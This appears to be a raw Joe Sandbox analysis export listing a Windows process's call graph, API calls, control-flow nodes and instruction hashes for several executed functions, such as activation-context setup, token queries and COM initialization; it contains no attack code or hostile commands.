LocalAlloc 2033->2034 2035 dd4197 AttachConsole 2033->2035 2036 dd43a7 2034->2036 2039 dd41c1 2034->2039 2035->2034 2037 dd43b6 ExitProcess 2036->2037 2038 dd43b0 FreeConsole 2036->2038 2038->2037 2040 dd43a0 LocalFree 2039->2040 2091 dd5695 2039->2091 2040->2036 2045 dd422a 2048 dd425a 2045->2048 2049 dd4233 2045->2049 2046 dd4202 LoadLibraryExW 2046->2045 2047 dd421a GetProcAddress 2046->2047 2047->2045 2051 dd4285 SetErrorMode 2048->2051 2052 dd4261 2048->2052 2050 dd40f3 5 API calls 2049->2050 2055 dd4240 2050->2055 2101 dd5911 PathIsRelativeW 2051->2101 2053 dd40f3 5 API calls 2052->2053 2056 dd426f 2053->2056 2058 dd4248 2055->2058 2059 dd4393 2055->2059 2056->2059 2060 dd4277 2056->2060 2057 dd42a3 2137 dd5d6a NtOpenProcessToken RtlNtStatusToDosError 2057->2137 2170 dd3fe7 CoInitializeEx 2058->2170 2061 dd439e 2059->2061 2062 dd4397 FreeLibrary 2059->2062 2178 dd37c3 CoInitializeEx 2060->2178 2061->2040 2062->2061 2067 dd4255 2067->2059 2068 dd4357 2197 dd38f0 LoadStringW 2068->2197 2069 dd42b6 2149 dd3e5b 2069->2149 2073 dd4370 2073->2059 2075 dd438c ReleaseActCtx 2073->2075 2076 dd4380 DeactivateActCtx 2073->2076 2074 dd434b LocalFree 2074->2073 2075->2059 2076->2075 2080 dd4306 2167 dd40f3 2080->2167 2082 dd4319 2083 dd4332 2082->2083 2084 dd433a DestroyWindow 2083->2084 2085 dd4341 FreeLibrary 2083->2085 2084->2085 2085->2074 2087 dd6966 2086->2087 2088 dd6962 2086->2088 2089 dd696b ApiSetQueryApiSetPresence 2087->2089 2090 dd6981 2087->2090 2088->2033 2089->2090 2090->2033 2093 dd56d2 2091->2093 2095 dd5771 2091->2095 2092 dd41ef 2092->2040 2097 dd40b1 NtQuerySystemInformation 2092->2097 2094 dd562f CompareStringW 2093->2094 2093->2095 2094->2093 2095->2092 2096 dd5884 CharNextW 2095->2096 2096->2092 2096->2095 2098 dd40dc 2097->2098 2211 dd61b0 2098->2211 2100 dd40f1 2100->2045 2100->2046 2102 dd5940 RtlSetSearchPathMode SearchPathW 2101->2102 2105 dd596f 2101->2105 2103 dd5ade 2102->2103 2102->2105 2104 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2103->2104 2106 dd5aed 2104->2106 2105->2103 2107 dd59d9 2105->2107 2108 dd59b8 GetFileAttributesW 2105->2108 2106->2057 2109 dd5afd 2107->2109 2110 dd59e7 2107->2110 2108->2107 2111 dd59ca CreateActCtxW 2108->2111 2217 dd62f8 2109->2217 2113 dd59fc CreateActCtxWWorker 2110->2113 2114 dd5abf ActivateActCtx 2110->2114 2111->2107 2113->2114 2116 dd5a27 CreateActCtxWWorker 2113->2116 2114->2103 2116->2103 2120 dd5a48 CreateActCtxWWorker 2116->2120 2118 dd5b39 2121 dd5c4e NtdllDefWindowProc_W 2118->2121 2124 dd5b50 SetWindowLongW 2118->2124 2119 dd5b74 GetWindowLongW 2119->2121 2123 dd5b85 GetWindow 2119->2123 2120->2114 2122 dd5a69 GetModuleHandleW CreateActCtxWWorker 2120->2122 2125 dd5c5c 2121->2125 2122->2103 2122->2114 2126 dd5c47 2123->2126 2127 dd5b99 memset GetClassNameW 2123->2127 2124->2125 2129 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2125->2129 2126->2121 2130 dd5bed GetWindow 2127->2130 2131 dd5bc3 CompareStringW 2127->2131 2133 dd5c68 2129->2133 2130->2126 2132 dd5bfa GetWindowLongW 2130->2132 2131->2130 2134 dd5be2 GetWindow 2131->2134 2132->2126 2135 dd5c10 2132->2135 2133->2057 2134->2130 2135->2126 2136 dd5c26 SetWindowLongW 2135->2136 2136->2126 2138 dd5da1 2137->2138 2139 dd5dc7 2138->2139 2221 dd5cf1 NtQueryInformationToken 2138->2221 2144 dd5df7 2139->2144 2145 dd5ddd QueryActCtxW 2139->2145 2146 dd5dff 2139->2146 2141 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2143 dd42ae 2141->2143 2143->2068 2143->2069 2144->2146 2147 dd5e08 NtOpenProcessToken 2144->2147 2145->2144 2146->2141 2147->2146 2148 dd5e1d NtSetInformationToken NtClose 2147->2148 2148->2146 2227 dd3c66 LoadLibraryExW 2149->2227 2152 dd3f62 2152->2074 2162 dd3f6b GetPEB RtlImageNtHeader 2152->2162 2153 dd3ea2 2244 dd3d62 2153->2244 2155 dd3f3b 2157 dd38f0 12 API calls 2155->2157 2156 dd3f29 2156->2152 2159 dd3f58 FreeLibrary 2157->2159 2159->2152 2160 dd3edf WideCharToMultiByte LocalAlloc 2160->2155 2161 dd3f0c WideCharToMultiByte 2160->2161 2161->2156 2163 dd3fbf ImageDirectoryEntryToData 2162->2163 2164 dd3f89 2162->2164 2165 dd3fd4 2163->2165 2164->2163 2166 dd5c6c LoadIconW LoadCursorW RegisterClassW CreateWindowExW 2165->2166 2166->2080 2168 dd40b1 5 API calls 2167->2168 2169 dd4104 2168->2169 2169->2082 2171 dd400d CLSIDFromString 2170->2171 2172 dd4064 2170->2172 2174 dd401c CoCreateInstance 2171->2174 2175 dd405e CoUninitialize 2171->2175 2173 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2172->2173 2176 dd4070 2173->2176 2174->2175 2177 dd4037 2174->2177 2175->2172 2176->2067 2177->2175 2179 dd38ed 2178->2179 2180 dd37e2 CoInitializeSecurity 2178->2180 2179->2067 2181 dd37fe 2180->2181 2182 dd38e7 CoUninitialize 2180->2182 2283 dd205a CoCreateInstance 2181->2283 2182->2179 2185 dd381b GetCurrentThreadId 2285 dd53ad InitOnceExecuteOnce 2185->2285 2187 dd382a 2286 dd4d3c 2187->2286 2189 dd385c CreateEventW 2190 dd3880 2189->2190 2191 dd3872 SetEvent CloseHandle 2189->2191 2192 dd3884 CoWaitForMultipleHandles 2190->2192 2196 dd38cf CloseHandle 2190->2196 2191->2190 2194 dd38a1 2192->2194 2296 dd3584 2194->2296 2196->2182 2198 dd392c 2197->2198 2206 dd3a24 2197->2206 2317 dd1f86 2198->2317 2199 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2202 dd3a4d 2199->2202 2202->2073 2203 dd3951 LoadStringW 2204 dd3971 2203->2204 2203->2206 2205 dd397f CreateFileW 2204->2205 2204->2206 2205->2206 2207 dd39a7 WriteConsoleW WriteConsoleW 2205->2207 2206->2199 2209 dd39f5 2207->2209 2209->2209 2210 dd3a00 WriteConsoleW CloseHandle 2209->2210 2210->2206 2212 dd61b8 2211->2212 2213 dd61bb 2211->2213 2212->2100 2216 dd61c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2213->2216 2215 dd62f6 2215->2100 2216->2215 2220 dd61c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2217->2220 2219 dd5b02 2219->2118 2219->2119 2220->2219 2222 dd5d4c RtlNtStatusToDosError 2221->2222 2223 dd5d23 2221->2223 2225 dd5d57 NtClose 2222->2225 2223->2222 2224 dd5d46 2223->2224 2226 dd5d2f NtQueryInformationToken 2223->2226 2224->2222 2225->2139 2226->2222 2226->2224 2228 dd3c93 GetLastError 2227->2228 2229 dd3d12 RtlImageNtHeader 2227->2229 2232 dd3cdb 2228->2232 2233 dd3ca0 2228->2233 2230 dd3d1d 2229->2230 2231 dd3d51 2229->2231 2230->2231 2235 dd3d28 SetProcessMitigationPolicy 2230->2235 2238 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2231->2238 2234 dd3cf2 FormatMessageW 2232->2234 2256 dd3b09 2233->2256 2234->2231 2237 dd3cfc 2234->2237 2235->2231 2240 dd38f0 12 API calls 2237->2240 2241 dd3d60 2238->2241 2243 dd3d10 2240->2243 2241->2152 2241->2153 2242 dd3cab 2242->2231 2243->2231 2245 dd3d85 2244->2245 2246 dd3e52 2244->2246 2247 dd3dad LocalAlloc 2245->2247 2248 dd3d93 _wtoi GetProcAddress 2245->2248 2246->2155 2246->2156 2246->2160 2247->2246 2250 dd3ddf WideCharToMultiByte 2247->2250 2248->2246 2251 dd3e4b LocalFree 2250->2251 2252 dd3dfb GetProcAddress 2250->2252 2251->2246 2252->2251 2254 dd3e1f GetProcAddress 2252->2254 2254->2251 2255 dd3e3c GetProcAddress 2254->2255 2255->2251 2273 dd3a51 CreateFileW 2256->2273 2259 dd3b2b GetCurrentProcess IsWow64Process2 2260 dd3b4a 2259->2260 2272 dd3b91 2259->2272 2261 dd3b56 2260->2261 2262 dd3ba1 RtlWow64IsWowGuestMachineSupported 2260->2262 2266 dd3b60 GetSystemDirectoryW 2261->2266 2261->2272 2265 dd3bb3 2262->2265 2262->2272 2263 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2264 dd3b9f 2263->2264 2264->2234 2264->2242 2267 dd3bbc GetSystemWow64Directory2W 2265->2267 2265->2272 2268 dd3b72 2266->2268 2267->2268 2269 dd3b76 PathCchAppend 2268->2269 2268->2272 2270 dd3bd1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW Wow64EnableWow64FsRedirection 2269->2270 2269->2272 2271 dd3c2e WaitForSingleObject CloseHandle CloseHandle 2270->2271 2270->2272 2271->2272 2272->2263 2274 dd3af9 2273->2274 2275 dd3a88 memset ReadFile 2273->2275 2276 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2274->2276 2277 dd3ab0 2275->2277 2278 dd3af2 CloseHandle 2275->2278 2279 dd3b07 2276->2279 2277->2278 2280 dd3abb SetFilePointer 2277->2280 2278->2274 2279->2259 2279->2272 2280->2278 2281 dd3acc ReadFile 2280->2281 2281->2278 2282 dd3aeb 2281->2282 2282->2278 2284 dd207c CreateEventW 2283->2284 2284->2182 2284->2185 2285->2187 2287 dd4d5f 2286->2287 2293 dd4dea 2287->2293 2302 dd64a6 2287->2302 2289 dd4dab 2290 dd64a6 2 API calls 2289->2290 2291 dd4dc9 2290->2291 2292 dd64a6 2 API calls 2291->2292 2292->2293 2294 dd64a6 2 API calls 2293->2294 2295 dd4fbd 2293->2295 2294->2295 2295->2189 2297 dd35a6 2296->2297 2298 dd64a6 2 API calls 2297->2298 2300 dd35f1 2297->2300 2298->2300 2310 dd3306 2300->2310 2303 dd63b2 __EH_prolog3_catch 2302->2303 2306 dd6aca 2303->2306 2305 dd63ca 2305->2289 2307 dd6adf malloc 2306->2307 2308 dd6aee 2307->2308 2309 dd6ad2 _callnewh 2307->2309 2308->2305 2309->2307 2309->2308 2311 dd3320 2310->2311 2312 dd33d8 2311->2312 2313 dd337e AcquireSRWLockExclusive 2311->2313 2314 dd3399 ReleaseSRWLockExclusive 2311->2314 2315 dd33a9 ReleaseSRWLockExclusive 2311->2315 2316 dd33b3 DecodePointer 2311->2316 2312->2196 2313->2311 2314->2311 2315->2316 2316->2311 2318 dd1f94 2317->2318 2319 dd1fb6 2318->2319 2321 dd201a _vsnwprintf 2318->2321 2319->2203 2319->2206 2322 dd203e 2321->2322 2322->2319 2874 dd24a7 2875 dd24af 2874->2875 2877 dd24be 2874->2877 2878 dd23be 2875->2878 2879 dd240d 2878->2879 2880 dd23f1 GetModuleHandleExW 2878->2880 2881 dd242d GetModuleFileNameA 2879->2881 2882 dd2405 2879->2882 2880->2879 2880->2882 2881->2882 2883 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2882->2883 2884 dd2493 2883->2884 2884->2877 2885 dd60a6 _XcptFilter 2887 dd45a0 2890 dd51ae 2887->2890 2891 dd51ca 2890->2891 2892 dd5207 CoResumeClassObjects 2890->2892 2894 dd5216 2891->2894 2895 dd51d9 CoRegisterClassObject 2891->2895 2893 dd45b6 2892->2893 2892->2894 2894->2893 2896 dd521f CoRevokeClassObject 2894->2896 2895->2891 2897 dd5203 2895->2897 2896->2893 2896->2896 2897->2892 2897->2894 2898 dd61a0 2901 dd6735 2898->2901 2900 dd61a5 2900->2900 2902 dd675e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2901->2902 2903 dd675a 2901->2903 2904 dd67ad 2902->2904 2903->2902 2903->2904 2904->2900

                                                                                          Executed Functions

                                                                                          Function 00DD5911 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 258nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00DD5932
                                                                                          • RtlSetSearchPathMode.NTDLL(00008001), ref: 00DD5945
                                                                                          • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00DD5961
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?), ref: 00DD59BF
                                                                                          • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00DD59D1
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A17
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A38
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A59
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00DD5A98
                                                                                          • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 00DD5AB5
                                                                                          • ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00DD5AF3
                                                                                          • SetWindowLongW.USER32(?,00000000,00000001), ref: 00DD5B67
                                                                                          • GetWindowLongW.USER32(?,00000000), ref: 00DD5B77
                                                                                          • GetWindow.USER32(?,00000003), ref: 00DD5B89
                                                                                          • memset.MSVCRT ref: 00DD5BA7
                                                                                          • GetClassNameW.USER32(00000000,?,00000050), ref: 00DD5BB9
                                                                                          • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00DD5BD7
                                                                                          • GetWindow.USER32(00000000,00000003), ref: 00DD5BE5
                                                                                          • GetWindow.USER32(00000000,00000004), ref: 00DD5BF0
                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00DD5BFD
                                                                                          • SetWindowLongW.USER32(00000000,000000EC,?), ref: 00DD5C37
                                                                                          • NtdllDefWindowProc_W.NTDLL(?,0000001C,?,?), ref: 00DD5C56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$LongWorker$Path$Search$ActivateAttributesClassCompareFileHandleModeModuleNameNtdllProc_RelativeStringmemset
                                                                                          • String ID: $ $.manifest$IME$N$|
                                                                                          • API String ID: 1028207903-3161873098
                                                                                          • Opcode ID: 9ba832d05230ced030c03c6d92b8b228364e3f32d1a38ecdb2a157a7f927ebcb
                                                                                          • Instruction ID: d163846d0ce433a80e2aad4725ee87bf6032b46b8fc2fa7521a78cd8a62e07df
                                                                                          • Opcode Fuzzy Hash: 9ba832d05230ced030c03c6d92b8b228364e3f32d1a38ecdb2a157a7f927ebcb
                                                                                          • Instruction Fuzzy Hash: F791C171901729EFDB20AF64EC88FAAB7B8EB45321F144297F519E2390E77499448F70
                                                                                          Function 00DD4136 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 193memorylibrarynativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 51 dd4136-dd416b HeapSetInformation NtSetInformationProcess 52 dd416e-dd4177 51->52 52->52 53 dd4179-dd4195 call dd6953 52->53 56 dd41ab-dd41bb LocalAlloc 53->56 57 dd4197-dd41a6 AttachConsole 53->57 58 dd43a7-dd43ae 56->58 59 dd41c1-dd41cf call dd1ef1 56->59 57->56 60 dd43b6-dd43b7 ExitProcess 58->60 61 dd43b0 FreeConsole 58->61 64 dd41d5-dd41f1 call dd5695 59->64 65 dd43a0-dd43a1 LocalFree 59->65 61->60 64->65 68 dd41f7-dd4200 call dd40b1 64->68 65->58 71 dd422c-dd4231 68->71 72 dd4202-dd4218 LoadLibraryExW 68->72 75 dd425a-dd425f 71->75 76 dd4233-dd4242 call dd40f3 71->76 73 dd422a 72->73 74 dd421a-dd4228 GetProcAddress 72->74 73->71 74->71 78 dd4285-dd42b0 SetErrorMode call dd5911 call dd5d6a 75->78 79 dd4261-dd4271 call dd40f3 75->79 85 dd4248-dd4255 call dd3fe7 76->85 86 dd4393-dd4395 76->86 96 dd4357-dd436b call dd38f0 78->96 97 dd42b6-dd42e7 call dd3e5b 78->97 79->86 87 dd4277-dd4280 call dd37c3 79->87 85->86 88 dd439e 86->88 89 dd4397-dd4398 FreeLibrary 86->89 87->86 88->65 89->88 101 dd4370-dd4377 96->101 102 dd42e9-dd42ee 97->102 103 dd434b-dd4355 LocalFree 97->103 101->86 104 dd4379-dd437e 101->104 107 dd42f8-dd431b call dd3f6b call dd5c6c call dd40f3 102->107 108 dd42f0-dd42f4 102->108 103->101 105 dd438c-dd438d ReleaseActCtx 104->105 106 dd4380-dd4386 DeactivateActCtx 104->106 105->86 106->105 115 dd431d-dd432d call dd4072 107->115 116 dd4332-dd4338 107->116 108->107 115->116 118 dd433a-dd433b DestroyWindow 116->118 119 dd4341-dd4345 FreeLibrary 116->119 118->119 119->103
                                                                                          APIs
                                                                                          • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD414D
                                                                                          • NtSetInformationProcess.NTDLL ref: 00DD4162
                                                                                          • AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00DD4199
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00DD41B1
                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00DD420E
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00DD4220
                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00DD428A
                                                                                          • DestroyWindow.USER32(?), ref: 00DD433B
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD4345
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00DD434F
                                                                                          • DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00DD4386
                                                                                          • ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00DD438D
                                                                                            • Part of subcall function 00DD37C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00DD37D4
                                                                                            • Part of subcall function 00DD37C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00DD19CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00DD37F0
                                                                                            • Part of subcall function 00DD37C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD3808
                                                                                            • Part of subcall function 00DD37C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD381D
                                                                                            • Part of subcall function 00DD37C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00DD3866
                                                                                            • Part of subcall function 00DD37C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3873
                                                                                            • Part of subcall function 00DD37C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD387A
                                                                                            • Part of subcall function 00DD37C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00DD8420,?), ref: 00DD3897
                                                                                            • Part of subcall function 00DD37C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00DD38D9
                                                                                            • Part of subcall function 00DD37C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00DD38E7
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD4398
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00DD43A1
                                                                                          • FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00DD43B0
                                                                                          • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD43B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateDestroyErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWaitWindow
                                                                                          • String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
                                                                                          • API String ID: 3009286836-3890604504
                                                                                          • Opcode ID: fa50f8e8c9aeefbafc63bf4227e52440bc646e1c61ad61ca106a88905b40cc82
                                                                                          • Instruction ID: 30c940199d90c25254c6c33d3ff957bb261aff96a9135aa577e65fcec87ffbdd
                                                                                          • Opcode Fuzzy Hash: fa50f8e8c9aeefbafc63bf4227e52440bc646e1c61ad61ca106a88905b40cc82
                                                                                          • Instruction Fuzzy Hash: 5D616C71104301AFD710EF64DC59A6FBBEAEF88714F084A1AF995923A1DB31D909CB72
                                                                                          Function 00DD5D6A Relevance: 10.6, APIs: 7, Instructions: 87nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 168 dd5d6a-dd5d9f NtOpenProcessToken RtlNtStatusToDosError 169 dd5dac 168->169 170 dd5da1-dd5daa 168->170 171 dd5dae-dd5db4 call dd5cf1 169->171 172 dd5dc7-dd5dce 169->172 170->169 177 dd5db9-dd5dc4 NtClose 171->177 174 dd5e3e-dd5e4e call dd61b0 172->174 175 dd5dd0-dd5dd2 172->175 175->174 178 dd5dd4-dd5dd6 175->178 177->172 180 dd5dd8-dd5ddb 178->180 181 dd5dfa-dd5dfd 178->181 180->181 182 dd5ddd-dd5df5 QueryActCtxW 180->182 183 dd5dff-dd5e02 181->183 184 dd5e08-dd5e1b NtOpenProcessToken 181->184 182->181 186 dd5df7 182->186 183->174 187 dd5e04-dd5e06 183->187 184->174 185 dd5e1d-dd5e38 NtSetInformationToken NtClose 184->185 185->174 186->181 187->174
                                                                                          APIs
                                                                                          • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00DD5D8E
                                                                                          • RtlNtStatusToDosError.NTDLL ref: 00DD5D95
                                                                                          • NtClose.NTDLL ref: 00DD5DBE
                                                                                          • QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00DD5DED
                                                                                          • NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00DD5E13
                                                                                          • NtSetInformationToken.NTDLL ref: 00DD5E2F
                                                                                          • NtClose.NTDLL ref: 00DD5E38
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 3674487995-0
                                                                                          • Opcode ID: bdc5d08197e38a97721696a30432f1186d9844fb4e503878e79111ca4443ebc7
                                                                                          • Instruction ID: 803b0de59a95f6281fc78c6852dac1d22bf70489b389d7e0b6bad0fd236b4182
                                                                                          • Opcode Fuzzy Hash: bdc5d08197e38a97721696a30432f1186d9844fb4e503878e79111ca4443ebc7
                                                                                          • Instruction Fuzzy Hash: 11219636A01719ABDB209B949D49BBFBB79EB84721F150216F911F73D4DA309D04C7B0
                                                                                          Function 00DD3C66 Relevance: 7.6, APIs: 5, Instructions: 84librarywindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 189 dd3c66-dd3c91 LoadLibraryExW 190 dd3c93-dd3c9e GetLastError 189->190 191 dd3d12-dd3d1b RtlImageNtHeader 189->191 194 dd3cdb-dd3ced 190->194 195 dd3ca0-dd3ca9 call dd3b09 190->195 192 dd3d1d-dd3d26 191->192 193 dd3d51 191->193 192->193 197 dd3d28-dd3d4b SetProcessMitigationPolicy 192->197 198 dd3d53-dd3d61 call dd61b0 193->198 196 dd3cf2-dd3cfa FormatMessageW 194->196 205 dd3cab-dd3cad 195->205 206 dd3cb2-dd3cd9 195->206 196->193 200 dd3cfc-dd3d10 call dd38f0 196->200 197->193 200->193 205->198 206->196
                                                                                          APIs
                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00DD3C87
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00DD3C93
                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00DD3CF2
                                                                                            • Part of subcall function 00DD3B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD3B39
                                                                                            • Part of subcall function 00DD3B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00DD3B40
                                                                                            • Part of subcall function 00DD3B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00DD3B6C
                                                                                            • Part of subcall function 00DD3B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00DD3B87
                                                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00DD3D13
                                                                                          • SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00DD3D4B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
                                                                                          • String ID:
                                                                                          • API String ID: 4162338769-0
                                                                                          • Opcode ID: e3a44e225d5a50a9ac0d7708a11cea3828a53e636b22e9756a9bb67d722fb39f
                                                                                          • Instruction ID: 0f783f0858713340a3098a40cf70d9450889ceecd0cf6a7055835b891a3f041b
                                                                                          • Opcode Fuzzy Hash: e3a44e225d5a50a9ac0d7708a11cea3828a53e636b22e9756a9bb67d722fb39f
                                                                                          • Instruction Fuzzy Hash: 942171B06413186EFB14DB259C89FFA7BBDEBD5740F14406AB509E6390DAB0CF448A72
                                                                                          Function 00DD5CF1 Relevance: 4.6, APIs: 3, Instructions: 53nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
